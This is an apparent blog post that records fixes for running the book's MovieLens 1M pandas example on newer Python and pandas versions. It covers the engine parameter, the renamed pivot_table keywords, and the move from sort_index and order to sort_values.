Python For Data Analysis: A Learning Journey

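The introductory chapter of the book walks through an example that processes the MovieLens 1M dataset. According to the book, the dataset comes from GroupLens Research; the address it gives redirects to a page that offers various rating datasets collected from the MovieLens website as downloadable archives, and the MovieLens 1M dataset we need is among them.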

After downloading and extracting the archive, the folder contains three .dat files: users.dat, ratings.dat, and movies.dat.

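All three .dat tables are used in the example. My copy of Python For Data Analysis is the Chinese edition (PDF), first edition, 2014, and all of its examples were written for Python 2.7 and pandas 0.8.2. I have Python 3.5.2 and pandas 0.20.2 installed, where a number of functions and methods differ considerably: some have changed parameters, and some functions from the older version have been dropped altogether. As a result, running the book's sample code as printed produces several errors and warnings. In an environment configured like mine, the MovieLens 1M code runs into the following problems.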

When reading the .dat files into pandas DataFrame objects, the book gives this code:

```
import pandas as pd

unames = ['user_id', 'gender', 'age', 'occupation', 'zip']
users = pd.read_table('ml-1m/users.dat', sep='::', header=None, names=unames)

rnames = ['user_id', 'movie_id', 'rating', 'timestamp']
ratings = pd.read_table('ml-1m/ratings.dat', sep='::', header=None, names=rnames)

mnames = ['movie_id', 'title', 'genres']
movies = pd.read_table('ml-1m/movies.dat', sep='::', header=None, names=mnames)
```

Running this directly produces a warning:

```
F:/python/HelloWorld/DataAnalysisByPython-1.py:4: ParserWarning: Falling back to the 'python' engine because the 'c' engine does not support regex separators (separators > 1 char and different from '\s+' are interpreted as regex); you can avoid this warning by specifying engine='python'.
  users = pd.read_table('ml-1m/users.dat', sep='::', header=None, names=unames)
F:/python/HelloWorld/DataAnalysisByPython-1.py:7: ParserWarning: Falling back to the 'python' engine because the 'c' engine does not support regex separators (separators > 1 char and different from '\s+' are interpreted as regex); you can avoid this warning by specifying engine='python'.
  ratings = pd.read_table('ml-1m/ratings.dat', sep='::', header=None, names=rnames)
F:/python/HelloWorld/DataAnalysisByPython-1.py:10: ParserWarning: Falling back to the 'python' engine because the 'c' engine does not support regex separators (separators > 1 char and different from '\s+' are interpreted as regex); you can avoid this warning by specifying engine='python'.
  movies = pd.read_table('ml-1m/movies.dat', sep='::', header=None, names=mnames)
```

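The code still runs, but as a perfectionist I wanted to get rid of the warning. It says that the 'c' engine does not support regex separators (a separator longer than one character, such as '::', is interpreted as a regular expression), so pandas falls back to the 'python' engine. pandas.read_table happens to have an engine parameter that selects the parser engine, with 'c' and 'python' as the options here. Since the 'c' engine cannot handle this separator, setting engine='python' explicitly is enough: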

```
import pandas as pd

unames = ['user_id', 'gender', 'age', 'occupation', 'zip']
users = pd.read_table('ml-1m/users.dat', sep='::', header=None, names=unames, engine='python')

rnames = ['user_id', 'movie_id', 'rating', 'timestamp']
ratings = pd.read_table('ml-1m/ratings.dat', sep='::', header=None, names=rnames, engine='python')

mnames = ['movie_id', 'title', 'genres']
movies = pd.read_table('ml-1m/movies.dat', sep='::', header=None, names=mnames, engine='python')
```
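
The effect of engine='python' can be checked without the real files. The sketch below is only an illustration: it parses a three-line in-memory sample in the same '::'-separated layout as users.dat and counts any ParserWarning that pandas emits. It uses pd.read_csv, which accepts the same sep and engine parameters as read_table; the helper name load_users and the sample text are assumptions made for this example.

```python
import io
import warnings

import pandas as pd

# Small in-memory sample in the same '::'-separated layout as users.dat.
SAMPLE = "1::F::1::10::48067\n2::M::56::16::70072\n3::M::25::15::55117\n"
unames = ['user_id', 'gender', 'age', 'occupation', 'zip']


def load_users(text):
    """Parse '::'-separated text with the Python engine and record warnings."""
    with warnings.catch_warnings(record=True) as caught:
        warnings.simplefilter('always')
        frame = pd.read_csv(io.StringIO(text), sep='::', header=None,
                            names=unames, engine='python')
    return frame, caught


users, caught = load_users(SAMPLE)

# Keep only the parser fallback warnings discussed above.
parser_warnings = [w for w in caught
                   if issubclass(w.category, pd.errors.ParserWarning)]
print(users)
print('ParserWarning count:', len(parser_warnings))
```

With the engine named explicitly, pandas has nothing to fall back from, so the list of parser warnings should stay empty.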

Next, the pivot_table method is used on the merged data to compute each movie's mean rating by gender. The book's code is:
```
mean_ratings = data.pivot_table('rating', rows='title', cols='gender', aggfunc='mean')
```
Running it as written raises an error and the code does not execute:
```
Traceback (most recent call last):
  File "F:/python/HelloWorld/DataAnalysisByPython-1.py", line 19, in <module>
    mean_ratings = data.pivot_table('rating', rows='title', cols='gender', aggfunc='mean')
TypeError: pivot_table() got an unexpected keyword argument 'rows'
```
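The TypeError says that 'rows' is not a keyword argument the method accepts. What is going on? Checking the pandas API documentation on the official site shows that the keyword arguments of pandas.pivot_table are different in version 0.20.2. To get the same result, replace rows with index; there is no cols parameter either, so use columns instead.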
```
mean_ratings = data.pivot_table('rating', index='title', columns='gender', aggfunc='mean')
```
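
To see the renamed keywords at work without downloading the dataset, here is a minimal sketch on toy data. The three small frames and the titles 'Movie A' and 'Movie B' are made up for illustration; only the column names follow the article, and the merge step is an assumption about how the combined data frame is built.

```python
import pandas as pd

# Hypothetical miniature versions of the three tables.
ratings = pd.DataFrame({'user_id': [1, 1, 2, 3],
                        'movie_id': [10, 20, 10, 10],
                        'rating': [5, 2, 3, 4]})
users = pd.DataFrame({'user_id': [1, 2, 3],
                      'gender': ['F', 'M', 'M']})
movies = pd.DataFrame({'movie_id': [10, 20],
                       'title': ['Movie A', 'Movie B']})

# Merge on the shared key columns (user_id, then movie_id).
data = pd.merge(pd.merge(ratings, users), movies)

# index/columns replace the old rows/cols keywords.
mean_ratings = data.pivot_table(values='rating', index='title',
                                columns='gender', aggfunc='mean')
print(mean_ratings)
```

'Movie B' has no rating from a male user in this toy data, so its M cell comes out as NaN.
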
To find the movies that female viewers like most, the DataFrame is sorted by the F column in descending order. The book's sample code is:
```
top_female_ratings = mean_ratings.sort_index(by='F', ascending=False)
```
This only produces a warning and does not stop the program:
```
F:/python/HelloWorld/DataAnalysisByPython-1.py:32: FutureWarning: by argument to sort_index is deprecated, pls use .sort_values(by=...)
  top_female_ratings = mean_ratings.sort_index(by='F', ascending=False)
```
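The warning says that the by argument of sort_index is deprecated and that sort_values(by=...) should be used instead. The API documentation describes pandas.DataFrame.sort_index as "Sort object by labels (along an axis)" and pandas.DataFrame.sort_values as "Sort by the values along either axis". Sorting by the values of a column is what sort_values is for, and it gives the same result as the old sort_index(by=...) call, so I simply switched to sort_values. The later "measuring rating disagreement" part uses sort_index in the same way, and it can be replaced with sort_values there too.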
```
top_female_ratings = mean_ratings.sort_values(by='F', ascending=False)
```
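
The difference between the two methods is easy to see on a small frame. This is only a sketch: the titles and ratings below are invented, and the variable by_title is a name introduced for the example.

```python
import pandas as pd

# Hypothetical mean ratings, indexed by title in no particular order.
mean_ratings = pd.DataFrame({'F': [3.0, 4.5, 4.0],
                             'M': [4.2, 3.1, 3.9]},
                            index=['Movie B', 'Movie C', 'Movie A'])

# sort_values orders rows by the values in column F.
top_female_ratings = mean_ratings.sort_values(by='F', ascending=False)

# sort_index orders rows by their labels (the titles).
by_title = mean_ratings.sort_index()

print(top_female_ratings)
print(by_title)
```
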
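The last error is also related to sorting. In "measuring rating disagreement", after the standard deviation of the ratings is computed, the filtered Series is sorted in descending order. The book's code is: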
```
print(rating_std_by_title.order(ascending=False)[:10])
```
This fails with:
```
Traceback (most recent call last):
  File "F:/python/HelloWorld/DataAnalysisByPython-1.py", line 47, in <module>
    print(rating_std_by_title.order(ascending=False)[:10])
  File "E:\Program Files\Python35\lib\site-packages\pandas\core\generic.py", line 2970, in __getattr__
    return object.__getattribute__(self, name)
AttributeError: 'Series' object has no attribute 'order'
```
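The order method no longer exists, so I had to look for a replacement in the API documentation. There are two candidates, sort_index and sort_values, the same as for DataFrame. To be safe, and because the goal is to sort by value, I chose sort_values: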
```
print(rating_std_by_title.sort_values(ascending=False)[:10])
```
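
A minimal sketch of the same step on invented data: it groups ratings by title, takes the standard deviation, and sorts the resulting Series in descending order. The titles and ratings are hypothetical, and head(10) is used here as an equivalent way to take the first ten entries.

```python
import pandas as pd

# Hypothetical ratings: Movie A is divisive, Movie B is not.
data = pd.DataFrame({
    'title': ['Movie A', 'Movie A', 'Movie B', 'Movie B', 'Movie C', 'Movie C'],
    'rating': [1, 5, 3, 3, 2, 4],
})

# Sample standard deviation of the ratings for each title.
rating_std_by_title = data.groupby('title')['rating'].std()

# Series.sort_values takes over the role of the removed Series.order.
top_disagreement = rating_std_by_title.sort_values(ascending=False).head(10)
print(top_disagreement)
```
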
The result matches the one shown in the book, so the replacement is safe to use.

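Differences between versions of a third-party library can be substantial. My advice is to use the latest version and keep the API documentation on the official site at hand, which resolves most problems of this kind.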
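
Alongside the documentation, the installed library can be asked directly which names it supports. The sketch below is one possible way to do that with the standard inspect module; the helper accepts is a name introduced for this example, not part of pandas.

```python
import inspect
import sys

import pandas as pd

# Report the versions actually in use.
print('Python', sys.version.split()[0])
print('pandas', pd.__version__)


def accepts(func, keyword):
    """Return True if func's signature has a parameter named keyword."""
    return keyword in inspect.signature(func).parameters


# Check the old and new pivot_table keywords against the installed version.
for keyword in ('rows', 'cols', 'index', 'columns'):
    print(keyword, accepts(pd.DataFrame.pivot_table, keyword))

# Check whether a method still exists before relying on it.
print('Series.order:', hasattr(pd.Series, 'order'))
print('Series.sort_values:', hasattr(pd.Series, 'sort_values'))
```

A check like this shows what the installed version accepts, while the API documentation explains which replacement to use.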
